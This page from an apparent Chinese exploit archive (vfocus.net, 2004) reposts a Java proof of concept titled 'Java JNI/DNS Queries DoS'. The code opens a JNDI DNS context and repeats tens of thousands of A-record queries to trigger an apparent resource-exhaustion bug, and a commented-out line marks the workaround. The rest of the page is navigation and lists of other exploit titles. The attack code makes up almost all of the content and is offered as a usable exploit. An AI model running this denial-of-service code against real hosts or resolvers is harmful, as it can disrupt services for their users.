首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Java JNI/DNS Queries DoS|
来源:vfocus.net 作者:vfocus 发布时间:2004-11-20  

Java JNI/DNS Queries DoS

import java.util.*;
import javax.naming.directory.*;

public class DNSLookupBug {
public static void main(String[] args) {
try {
final Hashtable env = new Hashtable();
env.put("java.naming.factory.initial",
"com.sun.jndi.dns.DnsContextFactory");

DirContext dnsContext = new InitialDirContext(env);

final String[] domain = new String[] {"A"};
for (int i = 0; i < 0xffff; i++) {
dnsContext.getAttributes("sun.com", domain);
if (i % 1000 == 0) {
// use this as a workaround
//dnsContext = new InitialDirContext(env);
System.out.println(i);
}
}

} catch (Exception e) {
e.printStackTrace();
}
}
}



 
[收藏] [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
用户名: 新注册) 密码: 匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·3ctftpsvc Buffer Overflow (Lon
·Internet Explorer 6.0 SP2 File
·动网上传漏洞利用工具Gui版(De
·VMware 5.5.1 COM Object Arbitr
·Guestbara <= 1.2 Change Admin
·Internet Explorer Version 6.0.
·The IIS Worker Process (w3wp)
·SPIDynamics WebInspect Cross-A
·phpwind 5.x exploits
·serv-u本地权限提升工具|
·oneSCHOOL (all versions) admin
·Macromedia Flash Player Flash.
  相关文章
·Technote remote command execut
·TWiki 20030201 search.pm Remot
·Cscope version 15.5 and minor
·phpBB highlight parameter Proc
·Secure Network Messenger DoS E
·CoffeeCup FTP Clients Remote B
·Orginal Advisory and exploit b
·WeOnlyDo! COM Ftp DELUXE Activ
·Internet Explorer 6.0 SP2 File
·phpBB highlight parameter Proc
·Microsoft Windows Compressed (
·Invision Power Board v2.0.0 -
  推荐广告
CopyRight © 2002-2009 VFocuS.Net All Rights Reserved